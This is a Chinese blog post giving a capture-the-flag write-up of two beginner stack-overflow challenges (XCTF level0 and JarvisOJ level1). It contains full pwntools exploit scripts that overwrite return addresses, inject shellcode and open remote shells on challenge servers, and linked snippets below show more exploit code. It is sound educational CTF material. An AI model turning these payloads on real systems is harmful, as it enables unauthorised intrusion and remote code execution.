pwn入门xctf:level0和[JarvisOj]:level1题解

最新推荐文章于 2024-03-16 21:19:11 发布
最新推荐文章于 2024-03-16 21:19:11 发布
阅读量988 收藏 2
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43627239/article/details/97151203
版权

xctf的pwn题level0

这是一个简单的栈溢出题 打开题目下载附件拖到虚拟机中查看它的各种保护机制

发现栈区不可执行 我们用物理机中的IDA看一下

 

输出字符串helloWord之后执行vulnerable_function()函数,没有与用户交互,跟进去查看发现无参数传入,buf长度为0x80,即0x80h填充满,之后跟上地址就可以实现任意跳转。

接下来查找字符串/bin/sh,再一路跟进到callsystem函数,发现可以在read时,将函数返回地址覆盖为callsystem函数地址,则可实现漏洞利用

然后我们推测一下返回地址 ,查看vulnerable_function()函数汇编代码

push之后,add指令开辟buf空间,retn指令之前多了个leave指令,

leave指令

在16位汇编下相当于:
mov sp,bp
pop bp
 
在32位汇编下相当于:
mov esp,ebp
pop ebp
 
/* leave指令将EBP寄存器的内容复制到ESP寄存器中,
以释放分配给该过程的所有堆栈空间。然后,它从堆栈恢复EBP寄存器的旧值。*/

就是在函数返回之前,有一次pop操作,要通过read函数覆盖返回地址,则还需将push指令的内容覆盖,ELF文件为64位程序,pop指令后64位2进制出栈,即8个字符大小(push类似),所以运行的脚本中需要有payload = 0x88*'a' + p64(call_system)

脚本如下:

from pwn import *    #导入pwntools中pwn包的所有内容
p = remote("111.198.29.45","56927") #链接服务器远程交互,等同于nc ip 端口 命令
call_system = 0x400596   #ELF文件中callsystem标记的地址
payload = 0x88*'a' + p64(call_system) #先用0x88个无用字符覆盖buf和push中的内容,之后再覆盖返回地址
p.sendline(payload) #送payload
p.interactive() #反弹shell进行交互

运行得到返回的shell 再cat得到flag

PS:如果出现如下错误:

重新获取一下题目场景 修改远程登录的ip和端口

[JarvisOj]:level1:

和上边题很相似很多语句和上题也相似。

先放脚本 运行脚本

from pwn import *
context(log_level = 'debug', arch = 'i386', os = 'linux')

shellcode = asm(shellcraft.sh())
io = remote('pwn2.jarvisoj.com', 9877)
text = io.recvline()[14: -2]

buf_addr = int(text, 16)

payload = shellcode + 'a' * (0x88 + 0x4 - len(shellcode)) + p32(buf_addr)
io.send(payload)
io.interactive()
io.close()

把脚本单句运行

[14:-2]只是python里面的一个切片,代表”What’sthis:0xffee6c50?”

这句话取第14个到倒数第二个字符

这里的text为buf的地址,只不过是字符型的,需要int(text,16)用16进制的方法转化为int型

相比level0,这里多加了一个shellcode,和多减了一个len(shellcode),shellcode和p32(buf_addr)的值如下图

过程:同样用checksec查一下保护。几乎没开什么保护措施。关键的是NX没开,意味着栈上的数据可执行。

用ida反汇编,找到溢出点。

跟进没有找到system函数了,但是发现这个函数调用了printf函数,输出了buf的地址,NX保护是关闭的,那么就意味着,如果将shellcode写到buf中,函数返回时跳转到buf位置,就可以执行shellcode了

然后跟进分析 写出脚本就如上边的 运行获得shell

参考:https://www.jianshu.com/p/d267577c7af1

https://www.jianshu.com/p/d267577c7af1

 

 

 

颜又舞
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
level0(xctf)
weixin_43868725的博客
05-06 916
0x0 程序保护和流程 保护: 流程: main() vulnerable_function() 很明显的栈溢出,read()允许输入0x200个字符而buf只有0x80 0x1 利用过程 我们在ida的函数窗口处发现了一个callsystem(),可以直接getshell 所以我们只需要将返回地址覆盖成callsystem()的地址就可以拿到flag,buf=0x88*‘a’+p64(0...
pwn1 babystack [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列19
重新启程
12-25 1633
题目地址:pwn1 babystack 已经到了高手进阶区的第八题了,已经渐入佳境了。哈哈! 废话不说,看看题目先 厦门邀请赛的题目,还是2星难度,那就开工了。 管理检查一下保护机制: [*] '/ctf/work/python/pwn1/babystack' Arch: amd64-64-little RELRO: Full RELRO Stac...
xctf--新手练习区--level0
gclome的博客
04-19 651
writeup:拿到这个文件之后先checksec 64位程序,开了NX 然后再运行一下: 会输出Hello,World,然后是输入,我这里输入了aaaaaaaaaaaaaaaaaa 放入IDA里,开始展示的是汇编代码,然后我们F5就可以查看源码,我们先看看main函数里面的: 主函数就是一行打印,一行输入,不过有意思的是,buf的长度是0x80,而read函数允许输入0x200,那我们岂...
XCTFlevel0[WriteUP]
最新发布
如有错误感谢斧正
03-16 425
PWN入门题目:XCTF攻防世界的level0。
# xctf level 0 wp
qq_45895967的博客
01-10 174
xctf level 0 wp 使用checksec 检查一下 64位 开启了NX保护,丢进ida 进入vlunerable函数 发现可以溢出,同时又找到一个后门函数 直接溢出返回callsystem函数拿到flag
BUUCTF刷题之路-jarvisoj_level01
qq_30528603的博客
05-27 258
看到个read函数,而且能输入的最大字节数为512字节。而buf我们看到是128字节的限度,那应该是存在栈溢出的问题。而且我们直接看到有个后门函数,和前面几题的套路如出一辙。
pwn100 [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列16
重新启程
12-23 1312
题目地址:pwn100 本题已经是高手进阶区的第五题了,难度也在不断加大。需要补充的知识点也越来越多了。 废话不说,看看题目 没什么建议和描述,那就先下载附件,看看保护机制 root@mypwn:/ctf/work/python/pwn-100# checksec d0b5f9b486bb480c9035839ec896252e [*] '/ctf/work/python/pwn-10...
warmup [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列14
重新启程
12-23 1832
题目地址:warmup 这是高手进阶区的第三题,我们先看下题目内容 这个题目没有附件,那就是要fuzz的题目了,我们先正常走一下程序看看 root@mypwn:/ctf/work/python/warmup# nc 111.198.29.45 32453 -Warm Up- WOW:0x40060d >AAA 这个题目的出发点就是要大家做fuzz,看下提示内容有个地址0x40060...
shell [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列25
重新启程
12-27 744
题目地址:shell 这个题目是高手进阶区的第14题,这一题我没有按照顺序来,耍脾气来!呵呵 看看保护机制 [*] '/ctf/work/python/shell/shell' Arch: amd64-64-little RELRO: No RELRO Stack: Canary found NX: NX enabled ...
stack2 [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列15
重新启程
12-23 1349
题目地址:stack2 这是高手进阶区的第四题了,速度挺快啊,朋友!加油! 废话不说,看看题目先 没有什么特别的内容,那就看看保护机制 root@mypwn:/ctf/work/python/stack2# checksec fcca8ceb507544d1bd9c4a7925907a1d [*] '/ctf/work/python/stack2/fcca8ceb507544d1b...
BUUCTF jarvisoj_level0 1
qq_56313338的博客
10-14 411
64位ubuntu18以上系统调用system函数时是需要栈对齐的。再具体一点就是64位下system函数有个movaps指令,这个指令要求内存地址必须16字节对齐。跳过了push rbp之后,rsp就少压栈了8字节,此时栈16位对齐。
pwn level1、level2
qq_43613772的博客
07-24 1000
下载文件之后马上查一下保护,NX为打开状态,NX为文件保护的一种方式。 用IDA打开进行反汇编,找溢出点。 看到很显眼的system后,于是想着是否可以通过控制调用system(“/bin/sh”)得到shell,将返回地址用system的地址覆盖,将传入参数设置成”/bin/sh”,用ida查找了一下字符串,刚好发现了”/bin/sh”,记下地址。 逻辑示意图: 注意不能在vulnerabl...
XCTF PWN level0
prettyX的博客
06-09 305
查看基本信息 尝试运行 IDA F5 再看下vulnerable_function()函数,存在溢出 同时,还存在callsystem()函数 所以把返回地址,覆盖到callsystem()函数地址,即可 Exp 注意:因为Python2不再维护,编写脚本使用Python3,使用Python3和2的区别,就是把Payload作为占位的部分变成Bytes #python3 from pwn import * p=remote('111.200.241.244',..
[BUUCTF]PWN——jarvisoj_level1
BangSen1的博客
03-31 229
jarvisoj_level1 例行检查,32位,未开启任何保护。 运行一下,给了一个地址 0xffef96b0 用IDA打开,查看主函数 查看function函数。由此我们可以知道 bufadddr= 0xffef96b0, buf存在溢出漏洞。由于题目并没有开启任何保护。所以我们可以先通过read读入shellcode,然后利用溢出漏洞将ret覆盖为buf参数地址(此时buf里是shellcode)去执行即可获取shell。 ...
铁人三项_第五赛区_2018_rop
z1r0的博客
12-05 163
铁人三项_第五赛区_2018_rop 查看保护 溢出,ret2libc from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 27080) else: r = process(file_name) elf = ELF(file_name) def dbg(
jarvisoj_level1
m0sway的博客
12-03 2263
jarvisoj_level1 使用checksec查看: 保护全关,并且还有RWX区域。栈溢出的题目的话直接ret2shellcode即可。 放进IDA中查看: 主函数中直接给出漏洞函数: 妥妥的一个栈溢出了,程序会输出buf的地址。 查看了下字符串也没有关键字符串,看来就是ret2shellcode 然而…BUU上的环境可能有点问题。并不能打通。 于是…使用ret2libc的方式。用write泄露libc的地址,然后捣鼓捣鼓。 exp: from pwn import * from six imp
jarvisoj pwn level1
Joey_l的博客
07-31 436
https://www.jarvisoj.com/challenges 拿到程序后先file可知为32位和动态链接 file level1 然后checksec检查保护机制 checksec level1 拖入ida查看,在vulnerable_function()函数的printf()处存在注入点 栈结构: 低地址→高地址 buf→ebp→eip(返回地址) 思路:没有s...
BUUCTF jarvisoj_level0
、moddemod
06-11 676
exp from pwn import * context(log_level='debug', arch='amd64') p = remote('node3.buuoj.cn', 26990) proc_name = './level0' # p = process(proc_name) # elf = p.elf elf = ELF(proc_name) bin_sh_str = 0x400684 system_plt = elf.plt['system'] pop_rdi_ret = 0x40.
BUUCTF_jarvisoj_level1
qq_39869547的博客
02-06 984
和原题的差别在于,远程不回显栈地址。直接常规栈溢出即可 #!/usr/bin/env python # -*- coding: utf-8 -*- from pwn import * from LibcSearcher import * elf = ELF("./level1") shellcode = asm(shellcraft.sh()) io = remote("node3.buuoj.c...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值